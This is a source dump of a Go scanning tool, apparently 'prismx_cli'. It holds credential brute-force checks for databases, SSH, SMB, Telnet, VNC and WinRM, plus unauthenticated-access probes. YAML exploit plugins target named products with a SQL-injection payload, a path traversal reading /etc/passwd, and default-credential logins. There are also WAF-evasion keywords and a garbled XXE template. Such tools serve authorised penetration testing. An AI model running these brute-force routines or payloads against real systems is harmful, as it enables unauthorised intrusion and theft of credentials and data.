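	client, err := netUtils.SendDialTimeout("tcp", t.Target, t.Config.Timeout)
	if err != nil {
		return nil
	}
	defer client.Close()

	// One deadline covers both the write and the read below.
	if client.SetDeadline(time.Now().Add(t.Config.Timeout)) != nil {
		return nil
	}
	if _, err = client.Write([]byte("stats\n")); err != nil {
		return nil
	}

	// Only the first read (at most 1024 bytes) is inspected.
	rev := make([]byte, 1024)
	n, err := client.Read(rev)
	if err != nil {
		return nil
	}
	if !strings.Contains(string(rev[:n]), "STAT") {
		return nil
	}
	return models.MSG{
		Name:    "Memcached unauthorized",
		Type:    "Unauthorized",
		Payload: models.Dict{},
		Target:  t.Target,
	}
}


--------------------------------------------------------------------------------
/core/hydra/mongodb.go:
--------------------------------------------------------------------------------
package hydra

import (
	"context"
	"fmt"
	"go.mongodb.org/mongo-driver/mongo"
	"go.mongodb.org/mongo-driver/mongo/options"
	"go.mongodb.org/mongo-driver/mongo/readpref"
	"prismx_cli/core/models"
)

// MongodbWeakPass checks whether the MongoDB service at the task's target
// accepts the task's username/password pair.
//
// res must hold a models.HydraTask. It returns a models.MSG describing the
// finding when Connect and Ping both succeed and nil otherwise. The returned
// payload carries the accepted password in clear text.
func MongodbWeakPass(res any) any {
	t := res.(models.HydraTask)

	ctx, cancel := context.WithTimeout(context.Background(), t.Config.Timeout)
	defer cancel()

	opt := options.Client()
	// proxyDialer is declared elsewhere in this package.
	opt.SetDialer(&proxyDialer{
		timeout: t.Config.Timeout,
	})
	// NOTE(review): user and password are interpolated into the URI without
	// escaping, so an entry containing '@', ':' or '/' changes how the URI is
	// parsed, including which host it names. Confirm the values are escaped
	// upstream.
	opt.ApplyURI(fmt.Sprintf("mongodb://%v:%v@%v/ichunt?authMechanism=SCRAM-SHA-1", t.Dict.User, t.Dict.Password, t.Target))

	client, err := mongo.Connect(ctx, opt)
	if err != nil {
		return nil
	}
	defer client.Disconnect(ctx)

	// Ping under the same deadline as Connect. The original pinged with
	// context.Background(), so the configured timeout did not bound this call.
	if err = client.Ping(ctx, readpref.Primary()); err != nil {
		return nil
	}
	return models.MSG{
		Name: "Mongodb WeakPassword",
		Type: "WeakPassword",
		Payload: models.Dict{
			User:     t.Dict.User,
			Password: t.Dict.Password,
		},
		Target: t.Target,
	}
}


--------------------------------------------------------------------------------
/core/hydra/mssql.go:
--------------------------------------------------------------------------------
package hydra

import (
	"database/sql"
	"fmt"
	_ "github.com/denisenkom/go-mssqldb"
	mssql "github.com/denisenkom/go-mssqldb"
	"net"
	"prismx_cli/core/models"
)

// MSSQLWeakPass checks whether the SQL Server instance at the task's target
// accepts the task's username/password pair.
//
// res must hold a models.HydraTask whose Target is a host:port string. It
// returns a models.MSG describing the finding when Ping succeeds and nil
// otherwise. The returned payload carries the accepted password in clear text.
func MSSQLWeakPass(res any) any {
	t := res.(models.HydraTask)

	host, port, err := net.SplitHostPort(t.Target)
	if err != nil {
		return nil
	}

	// encrypt=disable turns TLS off for the session, so the login under test
	// is not protected in transit.
	// NOTE(review): timeout is a time.Duration formatted with %v (for example
	// "3s"); confirm the driver accepts this key and format. Values containing
	// ';' would also alter the connection string.
	connector, err := mssql.NewConnector(fmt.Sprintf("server=%s;user id=%s;password=%s;port=%v;encrypt=disable;timeout=%v", host, t.Dict.User, t.Dict.Password, port, t.Config.Timeout))
	if err != nil {
		return nil
	}
	// proxyDialer is declared elsewhere in this package.
	connector.Dialer = &proxyDialer{
		timeout: t.Config.Timeout,
	}

	db := sql.OpenDB(connector)
	// Close on every path. Previously a failed Ping returned without closing
	// the pool.
	defer db.Close()

	if err = db.Ping(); err != nil {
		return nil
	}
	return models.MSG{
		Name: "MSSQL WeakPassword",
		Type: "WeakPassword",
		Payload: models.Dict{
			User:     t.Dict.User,
			Password: t.Dict.Password,
		},
		Target: t.Target,
	}
}


--------------------------------------------------------------------------------
/core/hydra/mysql.go:
--------------------------------------------------------------------------------
package hydra

import (
	"context"
	"database/sql"
	"fmt"
	"github.com/go-sql-driver/mysql"
	"net"
	"prismx_cli/core/models"
	"prismx_cli/utils/netUtils"
)

// noLog is a logger whose Print discards its arguments.
type noLog struct{}

// Print implements the driver's logger interface and does nothing.
func (noLog) Print(v ...interface{}) {}

// init installs noLog as the MySQL driver's logger.
func init() {
	mysql.SetLogger(noLog{})
}

// MySQLWeakPass checks whether the MySQL service at the task's target accepts
// the task's username/password pair.
//
// res must hold a models.HydraTask. It returns a models.MSG describing the
// finding when Ping succeeds and nil otherwise. The returned payload carries
// the accepted password in clear text.
func MySQLWeakPass(res any) any {
	t := res.(models.HydraTask)

	// NOTE(review): user and password are placed in the DSN without escaping;
	// confirm how entries containing '@', ':' or '/' are meant to be handled.
	db, err := sql.Open("mysql", fmt.Sprintf("%v:%v@tcp(%s)/information_schema?charset=utf8&timeout=%v", t.Dict.User, t.Dict.Password, t.Target, t.Config.Timeout))
	if err != nil {
		return nil
	}

	// Set the proxy: route the driver's "tcp" connections through the
	// project's dialer.
	// NOTE(review): this registers a driver-wide dialer on every call, so
	// concurrent tasks presumably share whichever registration came last.
	mysql.RegisterDialContext("tcp", func(ctx context.Context, addr string) (net.Conn, error) {
		return netUtils.SendDialTimeout("tcp", addr, t.Config.Timeout)
	})

	defer db.Close()

	if err = db.Ping(); err != nil {
		return nil
	}
	return models.MSG{
		Name: "MySQL WeakPassword",
		Type: "WeakPassword",
		Payload: models.Dict{
			User:     t.Dict.User,
			Password: t.Dict.Password,
		},
		Target: t.Target,
	}
}


--------------------------------------------------------------------------------
/core/hydra/oracle.go:
--------------------------------------------------------------------------------
package hydra

import (
	"net"
	"prismx_cli/core/models"
	"prismx_cli/utils/go-ora"
	"strconv"
)

// OracleWeakPass checks whether the Oracle listener at the task's target
// accepts the task's username/password pair under one of a fixed list of
// service names.
//
// res must hold a models.HydraTask whose Target is a host:port string with a
// numeric port. It returns a models.MSG describing the finding as soon as one
// connection opens and nil when none does. The returned payload carries the
// accepted password in clear text.
func OracleWeakPass(res any) any {
	t := res.(models.HydraTask)

	host, por, err := net.SplitHostPort(t.Target)
	if err != nil {
		return nil
	}
	atoi, err := strconv.Atoi(por)
	if err != nil {
		return nil
	}

	// Service names are tried in this order; a failure moves on to the next.
	for _, service := range []string{"orcl", "xe", "oracle"} {
		connection, err := go_ora.NewConnection(go_ora.BuildUrl(host, atoi, service, t.Dict.User, t.Dict.Password, nil))
		if err != nil {
			continue
		}
		if err := connection.Open(); err != nil {
			continue
		}
		connection.Close()
		return models.MSG{
			Name: "Oracle WeakPassword",
			Type: "WeakPassword",
			Payload: models.Dict{
				User:     t.Dict.User,
				Password: t.Dict.Password,
			},
			Target: t.Target,
		}
	}
	return nil
}


--------------------------------------------------------------------------------
/core/hydra/postgres.go:
--------------------------------------------------------------------------------
package hydra

import (
	"context"
	"fmt"
	"github.com/jackc/pgx/v5"
	"net"
	"prismx_cli/core/models"
	"prismx_cli/utils/netUtils"
)

// PGSQLWeakPass checks whether the PostgreSQL service at the task's target
// accepts the task's username/password pair.
//
// res must hold a models.HydraTask. It returns a models.MSG describing the
// finding when the connection and Ping succeed and nil otherwise. The returned
// payload carries the accepted password in clear text.
func PGSQLWeakPass(res any) any {
	t := res.(models.HydraTask)

	// sslmode=disable: the session is not TLS-protected.
	// NOTE(review): user and password are interpolated into the URL without
	// escaping, so an entry containing '@', ':' or '/' changes how the URL is
	// parsed, including which host it names. Confirm the values are escaped
	// upstream.
	config, err := pgx.ParseConfig(fmt.Sprintf("postgres://%v:%v@%s/postgres?sslmode=disable", t.Dict.User, t.Dict.Password, t.Target))
	if err != nil {
		return nil
	}
	config.DialFunc = func(ctx context.Context, network, addr string) (net.Conn, error) {
		return netUtils.SendDialTimeout(network, addr, t.Config.Timeout)
	}

	// Bound the handshake and the ping by the configured timeout, as the
	// MongoDB check does. The original used context.Background(), so only the
	// dial itself was limited.
	ctx, cancel := context.WithTimeout(context.Background(), t.Config.Timeout)
	defer cancel()

	conn, err := pgx.ConnectConfig(ctx, config)
	if err != nil {
		return nil
	}
	defer conn.Close(ctx)

	if err = conn.Ping(ctx); err != nil {
		return nil
	}
	return models.MSG{
		Name: "Postgres WeakPassword",
		Type: "WeakPassword",
		Payload: models.Dict{
			User:     t.Dict.User,
			Password: t.Dict.Password,
		},
		Target: t.Target,
	}
}


--------------------------------------------------------------------------------
/core/hydra/redis.go:
--------------------------------------------------------------------------------
package hydra

import (
	"github.com/go-redis/redis"
	"net"
	"prismx_cli/core/models"
	"prismx_cli/utils/netUtils"
)

// RedisWeakPass checks whether the Redis service at the task's target answers
// PING when given the task's password.
//
// res must hold a models.HydraTask. It returns a models.MSG when the reply is
// exactly "PONG" and nil otherwise. An empty password is reported as
// "Redis Unauthorized" rather than as a weak password. The returned payload
// carries the accepted password in clear text.
func RedisWeakPass(res any) any {
	t := res.(models.HydraTask)

	client := redis.NewClient(&redis.Options{
		Addr:     t.Target,
		DB:       0,
		Password: t.Dict.Password,
		Dialer: func() (net.Conn, error) {
			return netUtils.SendDialTimeout("tcp", t.Target, t.Config.Timeout)
		},
	})
	// Close on every path. Previously Close was deferred only after a
	// successful Ping, so a failed Ping left the client open.
	defer client.Close()

	pong, err := client.Ping().Result()
	if err != nil {
		return nil
	}

	// A reply other than PONG is treated as a honeypot and the task stops.
	if pong != "PONG" {
		return nil
	}

	msg := models.MSG{
		Name: "Redis WeakPassword",
		Type: "WeakPassword",
		Payload: models.Dict{
			User:     t.Dict.User,
			Password: t.Dict.Password,
		},
		Target: t.Target,
	}
	if t.Dict.Password == "" {
		msg.Name = "Redis Unauthorized"
		msg.Type = "Unauthorized"
	}
	return msg
}


--------------------------------------------------------------------------------
/core/hydra/smb.go:
--------------------------------------------------------------------------------
package hydra

import (
	"github.com/hirochachacha/go-smb2"
	"prismx_cli/core/models"
	"prismx_cli/utils/netUtils"
)

// SMBWeakPass checks whether the SMB service at the task's target accepts the
// task's username/password pair using NTLM authentication.
//
// res must hold a models.HydraTask. It returns a models.MSG describing the
// finding when the session is established and nil otherwise. The returned
// payload carries the accepted password in clear text.
func SMBWeakPass(res any) any {
	t := res.(models.HydraTask)

	conn, err := netUtils.SendDialTimeout("tcp", t.Target, t.Config.Timeout)
	if err != nil {
		return nil
	}
	// Close on every path. Previously a failed session setup returned without
	// closing the TCP connection.
	defer conn.Close()

	d := &smb2.Dialer{
		Initiator: &smb2.NTLMInitiator{
			User:     t.Dict.User,
			Password: t.Dict.Password,
		},
	}
	s, err := d.Dial(conn)
	if err != nil {
		return nil
	}
	s.Logoff()
	return models.MSG{
		Name: "SMB WeakPassword",
		Type: "WeakPassword",
		Payload: models.Dict{
			User:     t.Dict.User,
			Password: t.Dict.Password,
		},
		Target: t.Target,
	}
}


--------------------------------------------------------------------------------
/core/hydra/snmp.go:
--------------------------------------------------------------------------------
package hydra

import (
	"prismx_cli/core/models"
	"prismx_cli/utils/go-snmp"
	"prismx_cli/utils/netUtils"
)

// SNMPWeakPass checks whether the SNMP agent at the task's target answers a
// version 2c Get for OID .1.3.6.1.2.1.1.1.0 (sysDescr.0). Despite the name, no
// credentials from the task are used; the literal "public" is passed to the
// client, presumably as the community string.
//
// res must hold a models.HydraTask. It returns a models.MSG of type
// "Unauthorized" when the response holds an OctetString variable and nil
// otherwise.
func SNMPWeakPass(res any) any {
	t := res.(models.HydraTask)

	// Open a UDP connection to the target
	conn, err := netUtils.SendDialTimeout("udp", t.Target, t.Config.Timeout)
	if err != nil {
		return nil
	}
	// The original never closed this socket.
	defer conn.Close()

	snmp := &go_snmp.GoSNMP{t.Target, "public", go_snmp.Version2c, t.Config.Timeout, conn}

	resp, err := snmp.Get(".1.3.6.1.2.1.1.1.0")
	if err != nil {
		return nil
	}
	for _, v := range resp.Variables {
		if v.Type == go_snmp.OctetString {
			return models.MSG{
				Name:    "SNMP Unauthorized",
				Type:    "Unauthorized",
				Payload: models.Dict{},
				Target:  t.Target,
			}
		}
	}
	return nil
}


--------------------------------------------------------------------------------
/core/hydra/ssh.go: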
--------------------------------------------------------------------------------
package hydra

import (
	"golang.org/x/crypto/ssh"
	"prismx_cli/core/models"
	"prismx_cli/utils/netUtils"
)

// SSHWeakPass performs one SSH password authentication against t.Target with
// the dictionary user and password.
//
// res must hold a models.HydraTask; the type assertion panics otherwise.
// The result is a models.MSG describing the finding, or nil when the TCP dial
// or the SSH handshake (including authentication) fails. The returned MSG
// holds the tested credential in clear text.
func SSHWeakPass(res any) any {
	task := res.(models.HydraTask)

	tcp, err := netUtils.SendDialTimeout("tcp", task.Target, task.Config.Timeout)
	if err != nil {
		return nil
	}
	defer tcp.Close()

	clientCfg := &ssh.ClientConfig{
		User:    task.Dict.User,
		Timeout: task.Config.Timeout,
		// The server's host key is not verified, so the password is offered to
		// whatever answers on the address. This setting belongs to a credential
		// check only and should not be carried over into a real SSH client.
		HostKeyCallback: ssh.InsecureIgnoreHostKey(),
		Auth:            []ssh.AuthMethod{ssh.Password(task.Dict.Password)},
	}

	// The channel and request streams are discarded: the connection is closed
	// as soon as authentication has succeeded.
	sshConn, _, _, err := ssh.NewClientConn(tcp, task.Target, clientCfg)
	if err != nil {
		return nil
	}
	defer sshConn.Close()

	return models.MSG{
		Name: "SSH WeakPassword",
		Type: "WeakPassword",
		Payload: models.Dict{
			User:     task.Dict.User,
			Password: task.Dict.Password,
		},
		Target: task.Target,
	}
}
--------------------------------------------------------------------------------
/core/hydra/telnet.go:
--------------------------------------------------------------------------------
package hydra

import (
	"prismx_cli/core/models"
	"prismx_cli/utils/go-telnet"
)

// TelnetWeakPass connects to the Telnet service at t.Target and attempts one
// username/password login with the dictionary credential.
//
// res must hold a models.HydraTask; the type assertion panics otherwise.
// The result is a models.MSG describing the finding, or nil when Connect or
// Login returns an error. The returned MSG holds the tested credential in
// clear text.
//
// NOTE(review): nothing here closes the connection opened by Connect; the
// telnet package is project-local and not visible, so confirm whether the
// client releases it itself or offers a close method.
func TelnetWeakPass(res any) any {
	task := res.(models.HydraTask)

	client := &telnet.Client{
		UserName:     task.Dict.User,
		Password:     task.Dict.Password,
		LastResponse: "",
		ServerType:   telnet.UsernameAndPassword,
	}

	if err := client.Connect(task.Target, task.Config.Timeout); err != nil {
		return nil
	}
	if err := client.Login(); err != nil {
		return nil
	}

	return models.MSG{
		Name: "Telnet WeakPassword",
		Type: "WeakPassword",
		Payload: models.Dict{
			User:     task.Dict.User,
			Password: task.Dict.Password,
		},
		Target: task.Target,
	}
}
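--------------------------------------------------------------------------------
/core/hydra/vnc.go:
--------------------------------------------------------------------------------
package hydra

import (
	"context"
	"prismx_cli/core/models"
	"prismx_cli/utils/go-vnc"
	"prismx_cli/utils/netUtils"
)

// VncWeakPass performs one VNC handshake against t.Target using the dictionary
// password.
//
// res must hold a models.HydraTask; the type assertion panics otherwise.
// The result is a models.MSG describing the finding, or nil when the TCP dial
// or the VNC handshake fails. Only t.Dict.Password is passed to the VNC client
// configuration; t.Dict.User is copied into the payload but not used for
// authentication here. The returned MSG holds the tested credential in clear
// text.
func VncWeakPass(res any) any {

	var (
		t   = res.(models.HydraTask)
		msg = models.MSG{
			Name: "VNC WeakPassword",
			Type: "WeakPassword",
			Payload: models.Dict{
				User:     t.Dict.User,
				Password: t.Dict.Password,
			},
			Target: t.Target,
		}
	)

	conn, err := netUtils.SendDialTimeout("tcp", t.Target, t.Config.Timeout)
	if err != nil {
		return nil
	}
	// Close the TCP connection on every path, including a failed handshake.
	// If vc.Close below already closed it, this second Close only returns an
	// error that is ignored.
	defer conn.Close()

	vc, err := vnc.Connect(context.Background(), conn, vnc.NewClientConfig(t.Dict.Password))
	if err != nil {
		return nil
	}
	vc.Close()
	return msg
}
--------------------------------------------------------------------------------
/core/hydra/winrm.go:
--------------------------------------------------------------------------------
package hydra

import (
	"context"
	"github.com/masterzen/winrm"
	"net"
	"os"
	"prismx_cli/core/models"
	"prismx_cli/utils/netUtils"
	"strconv"
)

// WinRMWeakPass runs one harmless command ("echo ok > nul") over WinRM on
// t.Target with the dictionary user and password and reports whether it ran.
//
// res must hold a models.HydraTask; the type assertion panics otherwise.
// The result is a models.MSG describing the finding, or nil when t.Target is
// not a valid host:port pair, the client cannot be created, or the command
// fails.
//
// The endpoint is created with https=false, so the exchange goes over plain
// HTTP. Output of the remote command is written to this process's stdout and
// stderr.
//
// NOTE(review): unlike the other checks in this package the payload is an
// empty models.Dict, so the accepted credential is not recorded in the
// finding; confirm whether that is intended.
func WinRMWeakPass(res any) any {
	var (
		t   = res.(models.HydraTask)
		msg = models.MSG{
			Name:    "WinRM WeakPassword",
			Type:    "WeakPassword",
			Payload: models.Dict{},
			Target:  t.Target,
		}
	)

	// winrm.DefaultParameters is a package-level pointer. Work on a copy so
	// that setting Dial does not replace the dialer (and its captured target)
	// for every other task using the defaults at the same time.
	local := *winrm.DefaultParameters
	params := &local
	params.Dial = func(network, addr string) (net.Conn, error) {
		return netUtils.SendDialTimeout("tcp", t.Target, t.Config.Timeout)
	}

	// A target that does not split into host and numeric port would otherwise
	// produce an endpoint with an empty host and port 0.
	host, port, err := net.SplitHostPort(t.Target)
	if err != nil {
		return nil
	}
	intPort, err := strconv.Atoi(port)
	if err != nil {
		return nil
	}

	client, err := winrm.NewClientWithParameters(winrm.NewEndpoint(host, intPort, false, false, nil, nil, nil, t.Config.Timeout), t.Dict.User, t.Dict.Password, params)
	if err != nil {
		return nil
	}
	ctx, cancel := context.WithCancel(context.Background())
	defer cancel()
	_, err = client.RunWithContext(ctx, "echo ok > nul", os.Stdout, os.Stderr)
	if err != nil {
		return nil
	}
	return msg
}
--------------------------------------------------------------------------------
/core/hydra/zookeeper.go:
--------------------------------------------------------------------------------
package hydra

import (
	"bytes"
	"prismx_cli/core/models"
	"prismx_cli/utils/netUtils"
)

// ZookeeperWeakPass sends the four-letter command "envi" to t.Target over TCP
// and reports whether the reply contains the word "Environment".
//
// res must hold a models.HydraTask; the type assertion panics otherwise.
// The result is a models.MSG named "Zookeeper Unauthorized", or nil when the
// dial, the write or the read fails or the marker is absent. No credential is
// sent; the payload is left empty. Only the first read (at most 1024 bytes) is
// inspected.
//
// NOTE(review): no read deadline is set in this function; whether
// netUtils.SendDialTimeout bounds later reads is not visible here.
func ZookeeperWeakPass(res any) any {
	var (
		t   = res.(models.HydraTask)
		msg = models.MSG{
			Name:    "Zookeeper Unauthorized",
			Type:    "Unauthorized",
			Payload: models.Dict{},
			Target:  t.Target,
		}
	)
	conn, err := netUtils.SendDialTimeout("tcp", t.Target, t.Config.Timeout)
	if err != nil {
		return nil
	}
	// Close the connection on every path; the check needs it for one
	// request/response only.
	defer conn.Close()

	_, err = conn.Write([]byte("envi"))
	if err != nil {
		return nil
	}
	reply := make([]byte, 1024)
	n, err := conn.Read(reply)
	if err != nil {
		return nil
	}
	if bytes.Contains(reply[:n], []byte("Environment")) {
		return msg
	}
	return nil
}
--------------------------------------------------------------------------------
/core/owaspTop10/utils/utils.go:
--------------------------------------------------------------------------------
package utils

import (
	"net/url"
	"strings"
)

// WafKeyWord is a list of substrings, presumably matched against response
// bodies to recognise a WAF block page; its use is not visible in this file.
var WafKeyWord = []string{"造成安全威胁", "Bot-Block-ID", "您访问IP已被管理员限制", "本次事件ID", "当前访问疑似黑客攻击",
	"safedog", "拦截", "ValidateInputIfRequiredByConfig", "You don't have permission to access", "非法字符"}

// ParseQuery returns one URL string per query parameter of target, each with
// payload appended to that parameter's first value.
//
// The result is nil when the raw query cannot be parsed or holds no
// parameters. Limits of the textual replacement used here:
//   - url.ParseQuery returns decoded keys and values while target.String() is
//     still percent-encoded, so a parameter that needed escaping is not found
//     and the URL is appended unchanged;
//   - only the first textual match of "key=value" is replaced, which may sit
//     inside a longer parameter name (for example "id=1" inside "uid=1");
//   - map iteration makes the order of the returned URLs non-deterministic.
func ParseQuery(target *url.URL, payload string) (item []string) {
	paramMap, err := url.ParseQuery(target.RawQuery)
	// Nothing to rewrite when the query is malformed or carries no parameters.
	if err != nil || len(paramMap) == 0 {
		return nil
	}

	// The rendered URL does not change inside the loop, so build it once.
	raw := target.String()
	for key, value := range paramMap {
		pair := key + "=" + value[0]
		item = append(item, strings.Replace(raw, pair, pair+payload, 1))
	}
	return item
}
-------------------------------------------------------------------------------- /core/plugins/exploits/360_TianQing_ccid_SQL_injectable.yaml: -------------------------------------------------------------------------------- 1 | app: 360天擎 2 | query: title:"360新天擎" 3 | meta: 4 | name: 360 TianQing ccid SQL injectable 5 | level: 4 6 | tags: 7 | - sql_injection 8 | description: 天擎存在SQL注入漏洞,攻击者可以通过漏洞上传木马获取计算机权限。 9 | homepage: https://www.qianxin.com/product/detail/pid/49 10 | author: 一曲成殇 11 | references: '' 12 | solution: 安装官方补丁、升级系统版本 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: POST 19 | path: /api/dp/rptsvcsyncpoint?ccid=1 20 | redirect: true 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: code 25 | value: "200" 26 | type: equals 27 | create_at: "2021-10-15 14:27:08" 28 | -------------------------------------------------------------------------------- /core/plugins/exploits/74cms_5.0.1_前台SQL注入.yaml: -------------------------------------------------------------------------------- 1 | app: 74cms 2 | query: body:"74cms" 3 | meta: 4 | name: 74cms 5.0.1 前台SQL注入 5 | level: 4 6 | tags: 7 | - sql_injection 8 | description: |- 9 | 骑士人才系统(74cms)是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。由太原迅易科技有限公司于2009年正式推出。 10 | 74cms 5.0.1前台AjaxPersonalController.class.php文件存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。 11 | homepage: http://www.74cms.com/ 12 | author: 一曲成殇 13 | references: https://www.t00ls.net/articles-54436.html 14 | solution: 升级官方版本 15 | steps: 16 | verify_steps: 17 | type: and 18 | verify: 19 | - request: 20 | method: GET 21 | path: /index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa") 22 | and extractvalue(1,concat(0x7e,md5(99999999))) -- a 23 | redirect: true 24 | header: [ ] 25 | params: "" 26 | response: 27 | - name: body 28 | value: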
ef775988943825d2871e1cfa75473ec 29 | type: contains 30 | create_at: "2021-11-05 17:39:51" 31 | -------------------------------------------------------------------------------- /core/plugins/exploits/ACTI_Camera_images_File_read.yaml: -------------------------------------------------------------------------------- 1 | app: ACTI Camera 2 | query: title:"Web Configurator" 3 | meta: 4 | name: ACTI Camera images File read 5 | level: 4 6 | tags: 7 | - file_include 8 | description: 服务器任意文件读取 9 | homepage: http://www.acti.com 10 | author: 一曲成殇 11 | references: '' 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /images/../../../../../../../../etc/passwd 20 | redirect: true 21 | header: 22 | - Content-type: application/x-www-form-urlencoded 23 | params: "" 24 | response: 25 | - name: code 26 | value: "200" 27 | type: equals 28 | - name: body 29 | value: root 30 | type: contains 31 | create_at: "2021-10-15 14:47:03" 32 | -------------------------------------------------------------------------------- /core/plugins/exploits/Alibaba_Canal_Default_Password.yaml: -------------------------------------------------------------------------------- 1 | app: Alibaba Canal 2 | query: body:"canal" 3 | meta: 4 | name: Alibaba Canal Default Password 5 | level: 3 6 | tags: 7 | - weak_password 8 | description: 默认密码:admin/123456 9 | homepage: https://github.com/alibaba/canal 10 | author: 一曲成殇 11 | references: https://www.cnblogs.com/xiexiandong/p/12888582.html 12 | solution: 修改复杂密码 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: POST 19 | path: /api/v1/user/login 20 | redirect: false 21 | header: 22 | - Content-Type: application/json 23 | params: '{"username":"admin","password":"123456"}' 24 | response: 25 | - name: code 26 | value: "200" 27 | type: equals 28 | - name: body 29 | value: com.alibaba.otter.canal.admin.controller.UserController.login 30 | type: contains 31 | create_at: 
"2021-11-05 17:55:28" 32 | -------------------------------------------------------------------------------- /core/plugins/exploits/Alibaba_Canal_Info_Leak.yaml: -------------------------------------------------------------------------------- 1 | app: Alibaba Canal 2 | query: body:"canal" 3 | meta: 4 | name: Alibaba Canal Info Leak 5 | level: 4 6 | tags: 7 | - information_leakage 8 | description: |- 9 | canal是阿里巴巴旗下的一款开源项目,纯Java开发。 10 | Alibaba Canal存在信息泄露漏洞,攻击者可利用该漏洞获取敏感信息。 11 | homepage: https://github.com/alibaba/canal 12 | author: 一曲成殇 13 | references: ' https://my.oschina.net/u/4581879/blog/4753320' 14 | solution: 设置接口访问策略 15 | steps: 16 | verify_steps: 17 | type: and 18 | verify: 19 | - request: 20 | method: GET 21 | path: /api/v1/canal/config/1/1 22 | redirect: true 23 | header: [ ] 24 | params: "" 25 | response: 26 | - name: body 27 | value: ncanal.aliyun.accessKey 28 | type: contains 29 | - name: code 30 | value: "200" 31 | type: equals 32 | create_at: "2021-11-05 18:01:15" 33 | -------------------------------------------------------------------------------- /core/plugins/exploits/Alibaba_Nacos_控制台默认弱口令.yaml: -------------------------------------------------------------------------------- 1 | app: Alibaba-Nacos 2 | query: protocol:"http" 3 | meta: 4 | name: Alibaba Nacos 控制台默认弱口令 5 | level: 4 6 | tags: 7 | - weak_password 8 | description: Alibaba Nacos 控制台存在默认弱口令 nacos/nacos,可登录后台查看敏感信息 9 | homepage: https://github.com/alibaba/nacos 10 | author: 一曲成殇 11 | references: '' 12 | solution: 及时修改账户信息 13 | steps: 14 | verify_steps: 15 | type: or 16 | verify: 17 | - request: 18 | method: POST 19 | path: /nacos/v1/auth/users/login 20 | redirect: false 21 | header: 22 | - Content-Type: application/x-www-form-urlencoded 23 | params: username=nacos&password=nacos 24 | response: 25 | - name: code 26 | value: "200" 27 | type: equals 28 | - name: body 29 | value: "{\"accessToken\"" 30 | type: contains 31 | create_at: "2021-10-15 15:08:55" 32 | 
-------------------------------------------------------------------------------- /core/plugins/exploits/Apach_Solr_File_Read.yaml: -------------------------------------------------------------------------------- 1 | app: solr 2 | query: body:"solr" 3 | meta: 4 | name: Apach Solr File Read 5 | level: 4 6 | tags: 7 | - file_include 8 | description: 攻击者可以在未授权的情况下读取目标服务器敏感文件和相关内容。 9 | homepage: https://solr.apache.org/ 10 | author: 一曲成殇 11 | references: https://blog.csdn.net/DUANYU23/article/details/115588061 12 | solution: 限制url路径的访问 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /solr/admin/cores?indexInfo=false&wt=json 20 | redirect: true 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: body 25 | value: instanceDir 26 | type: contains 27 | - name: code 28 | value: "200" 29 | type: equals 30 | create_at: "2021-11-08 21:38:54" 31 | -------------------------------------------------------------------------------- /core/plugins/exploits/Apache Kylin Console 控制台弱口令.yaml: -------------------------------------------------------------------------------- 1 | app: Apache Kylin 2 | query: body:"Apache Kylin" 3 | meta: 4 | name: Apache Kylin Console 控制台弱口令 5 | level: 3 6 | tags: 7 | - weak_password 8 | description: Apache Kylin Console 控制台存在默认弱口令 admin:KYLIN,可被登录控制台进一步利用其他漏洞 9 | homepage: http://kylin.apache.org 10 | author: Administrator 11 | references: "" 12 | solution: 设置复杂密码 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /kylin/api/user/authentication 20 | redirect: true 21 | header: 22 | - Authorization: Basic YWRtaW46S1lMSU4= 23 | - Cookie: project=null 24 | params: "" 25 | response: 26 | - name: code 27 | value: "200" 28 | type: equals 29 | - name: code 30 | value: "401" 31 | type: not equals 32 | create_at: "2022-05-23 11:10:05" 33 | -------------------------------------------------------------------------------- 
/core/plugins/exploits/Apache_ActiveMQ默认密码.yaml: -------------------------------------------------------------------------------- 1 | app: ActiveMQ 2 | query: app:"ActiveMQ" 3 | meta: 4 | name: Apache ActiveMQ 默认密码 5 | level: 3 6 | tags: 7 | - weak_password 8 | description: 使用了默认密码admin/admin 9 | homepage: http://activemq.apache.org/ 10 | author: 一曲成殇 11 | references: https://blog.csdn.net/ge00111/article/details/72765210 12 | solution: 修改默认密码,可在/conf/users.properties文件中查找 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: POST 19 | path: /admin/ 20 | redirect: true 21 | header: 22 | - Authorization: Basic YWRtaW46YWRtaW4= 23 | params: "" 24 | response: 25 | - name: body 26 | value: Welcome to the Apache ActiveMQ 27 | type: contains 28 | - name: code 29 | value: "200" 30 | type: equals 31 | create_at: "2021-11-05 17:49:35" 32 | -------------------------------------------------------------------------------- /core/plugins/exploits/Apache_Cocoon_Xml_注入_CVE-2020-11991.yaml: -------------------------------------------------------------------------------- 1 | app: Apache Cocoon 2 | query: title:"Dspace Home" 3 | meta: 4 | name: Apache Cocoon Xml 注入 CVE-2020-11991 5 | level: 3 6 | tags: 7 | - xxe 8 | description: |- 9 | CVE-2020-11991 与 StreamGenerator 有关,在使用 StreamGenerator 时,代码将解析用户提供的 xml。攻击者可以使用包括外部系统实体在内的特制 xml 来访问服务器系统上的任何文件。 10 | Apache Cocoon <= 2.1.12 11 | homepage: http://cocoon.apache.org/2.1/ 12 | author: 一曲成殇 13 | references: "" 14 | solution: "" 15 | steps: 16 | verify_steps: 17 | type: and 18 | verify: 19 | - request: 20 | method: POST 21 | path: /go-ora/api/product/manger/getInfo 22 | redirect: true 23 | header: [ ] 24 | params: \n ]>\n\nJohn \n&ent;\n 26 | response: 27 | - name: code 28 | value: "200" 29 | type: equals 30 | - name: body 31 | value: root 32 | type: equals 33 | create_at: "2021-10-15 15:36:48" 34 | -------------------------------------------------------------------------------- 
